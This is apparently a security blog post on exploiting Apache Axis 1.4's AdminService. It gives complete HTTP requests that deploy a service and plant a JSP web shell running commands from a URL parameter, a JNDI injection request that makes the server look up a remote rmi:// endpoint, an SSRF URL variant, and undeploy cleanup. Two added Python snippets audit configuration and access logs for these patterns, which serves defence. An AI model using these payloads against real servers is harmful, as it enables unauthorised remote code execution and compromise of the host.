Axis is used to deploy all kinds of interface services, and among them there is an AdminService interface that lets an administrator manage the service remotely. Its configuration lives in /axis/WEB-INF/server-config.wsdd (generated when the application is deployed), where enableRemoteAdmin defaults to false, so only local administration is allowed.

<service name="AdminService" provider="java:MSG">
<parameter name="allowedMethods" value="AdminService"/>
<parameter name="enableRemoteAdmin" value="false"/>
<parameter name="className" value="org.apache.axis.utils.Admin"/>
<namespace>http://xml.apache.org/axis/wsdd/</namespace>
</service>

In that case you need SSRF or a man-in-the-middle attack; first let's look at how it is exploited when remote administration is enabled.

Getting a shell by writing a file

Deploy a RandomService and point its log file at the shell path

POST /axis/services/AdminService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 1059
Host: 192.168.33.128:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:deployment
xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="RandomService" provider="java:RPC">
<requestFlow>
<handler type="RandomLog"/>
</requestFlow>
<ns1:parameter name="className" value="java.util.Random"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >
<parameter name="LogHandler.fileName" value="../webapps/axis/shell.jsp" />
<parameter name="LogHandler.writeToConsole" value="false" />
</handler>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>


Send a request to RandomService; the resulting error gets written to the error log, which is the shell file

POST /axis/services/RandomService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 874
Host: 192.168.33.128:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>


Visit the shell URL: view-source:http://192.168.33.128:8080/axis/shell.jsp?c=ifconfig

Note: the shell write path given when deploying the service (LogHandler.fileName ../webapps/axis/shell.jsp) works because I started Tomcat locally from tomcat/bin; the launch directory of a real target may differ, so the write path has to be adjusted to match.

JNDI injection

A researcher discovered that the getService() method of the Axis built-in class org.apache.axis.client.ServiceFactory leads to JNDI injection

POST /axis/services/AdminService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 746
Host: 127.0.0.1:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soapenv:Body>
<ns1:deployment xmlns:ns1="http://xml.apache.org/axis/wsdd/" xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<ns1:service name="jndiService" provider="java:RPC">
<ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

POST /axis/services/jndiService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 874
Host: 127.0.0.1:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr">
<soapenv:Header/>
<soapenv:Body>
<buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map">
<item>
<key xsi:type="soapenc:string">jndiName</key>
<value xsi:type="soapenc:string">rmi://ip:port/exp</value>
</item>
</environment>
</buil:getService>
</soapenv:Body>
</soapenv:Envelope>
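The settings this page walks through (enableRemoteAdmin on AdminService, a LogHandler whose fileName points at a JSP under the webapp, and a deployed service exposing ServiceFactory with wildcard allowedMethods) can all be audited from server-config.wsdd. The checker below is an added example, not code from the page or from Axis; the WSDD fragment it parses is constructed for the example.

```python
import xml.etree.ElementTree as ET

WSDD = "{http://xml.apache.org/axis/wsdd/}"

# Constructed server-config.wsdd fragment showing all three conditions (sample, not a real file).
SAMPLE_WSDD = """<deployment xmlns="http://xml.apache.org/axis/wsdd/">
  <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler">
    <parameter name="LogHandler.fileName" value="../webapps/axis/shell.jsp"/>
  </handler>
  <service name="AdminService" provider="java:MSG">
    <parameter name="allowedMethods" value="AdminService"/>
    <parameter name="enableRemoteAdmin" value="true"/>
    <parameter name="className" value="org.apache.axis.utils.Admin"/>
  </service>
  <service name="RandomService" provider="java:RPC">
    <parameter name="className" value="java.util.Random"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
  <service name="jndiService" provider="java:RPC">
    <parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
</deployment>"""

def params(elem):
    """Collect the <parameter name=.. value=..> children of a handler/service into a dict."""
    return {p.get("name"): p.get("value") for p in elem.findall(WSDD + "parameter")}

def audit_wsdd(xml_text):
    """Return (kind, name, reason) findings for the risky settings discussed on this page."""
    root = ET.fromstring(xml_text)
    findings = []
    for h in root.iter(WSDD + "handler"):
        target = params(h).get("LogHandler.fileName", "")
        # A LogHandler that writes into a .jsp is the file-write primitive used above.
        if h.get("type", "").endswith("LogHandler") and target.lower().endswith((".jsp", ".jspx")):
            findings.append(("handler", h.get("name"), "LogHandler writes a JSP: " + target))
    for s in root.iter(WSDD + "service"):
        p, name = params(s), s.get("name")
        if name == "AdminService" and p.get("enableRemoteAdmin", "false").lower() == "true":
            findings.append(("service", name, "enableRemoteAdmin is true"))
        if p.get("allowedMethods") == "*":
            findings.append(("service", name, "wildcard allowedMethods on " + str(p.get("className"))))
        if p.get("className") == "org.apache.axis.client.ServiceFactory":
            findings.append(("service", name, "exposes ServiceFactory.getService (JNDI lookup)"))
    return findings

if __name__ == "__main__":
    for kind, name, reason in audit_wsdd(SAMPLE_WSDD):
        print(f"{kind} {name}: {reason}")
```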

SSRF and man-in-the-middle attacks

Deploying a service via SSRF:

http://127.0.0.1:8080/axis/services/AdminService?method=!--><ns1:deployment+xmlns="http://xml.apache.org/axis/wsdd/"+xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"+xmlns:ns1="http://xml.apache.org/axis/wsdd/"><ns1:service+name="RandomService"+provider="java:RPC"><requestFlow><handler+type="RandomLog"/></requestFlow><ns1:parameter+name="className"+value="java.util.Random"/><ns1:parameter+name="allowedMethods"+value="*"/></ns1:service><handler+name="RandomLog"+type="java:org.apache.axis.handlers.LogHandler"><parameter+name="LogHandler.fileName"+value="../webapps/axis/shell.jsp"/><parameter+name="LogHandler.writeToConsole"+value="false"/></handler></ns1:deployment
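Both the POST deployment above and this GET-based variant leave a trace in the Tomcat access log. The scanner below is an added example (not from the page or from Axis) that flags AdminService requests from non-loopback sources and WSDD markup smuggled through the method query parameter; the log lines are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Tomcat-style access-log lines (sample data, not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "POST /axis/services/AdminService HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2020:10:00:02 +0000] "POST /axis/services/AdminService HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /axis/services/AdminService?method=!--><ns1:deployment+xmlns=%22http://xml.apache.org/axis/wsdd/%22><ns1:service+name=%22RandomService%22/></ns1:deployment HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /axis/services/Version?method=getVersion HTTP/1.1" 200 120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<verb>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)

def classify(line):
    """Return the reasons a log line is suspicious, or None if it is benign/unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    if not parts.path.endswith("/services/AdminService"):
        return None
    reasons = []
    if not ipaddress.ip_address(m["ip"]).is_loopback:
        reasons.append("AdminService reached from non-loopback " + m["ip"])
    # parse_qs already decodes %xx escapes and '+' in the query string.
    method_arg = parse_qs(parts.query).get("method", [""])[0]
    if method_arg.startswith("!--") or "<" in method_arg or "deployment" in method_arg:
        reasons.append("WSDD markup smuggled through the method query parameter")
    return reasons or None

def scan(log_text):
    """Return (source_ip, reasons) for every suspicious line in the log."""
    alerts = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            alerts.append((line.split()[0], reasons))
    return alerts

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

With SSRF or the CVE-2019-0227 man-in-the-middle, the request reaches AdminService from the host itself, so the source-address check alone is not enough; the query-string check catches the GET form regardless of source.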

Principle of the man-in-the-middle attack (CVE-2019-0227):

Cleanup

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<undeployment xmlns="http://xml.apache.org/axis/wsdd/">
<service name="randomService"/>
<handler name="RandomLog"/>
<service name="jndiService"/>
</undeployment>
</soapenv:Body>
</soapenv:Envelope>

Reference

http://mirror.navercorp.com/apache/axis/axis/java/1.4/
http://axis.apache.org/axis/java/apiDocs/org/apache/axis/management/ServiceAdmin.html
http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/
https://jianfensec.com/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/axis%201.4%20AdminService%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20jndi%E6%B3%A8%E5%85%A5%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%A9%E7%94%A8/
https://xz.aliyun.com/t/4768
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-0227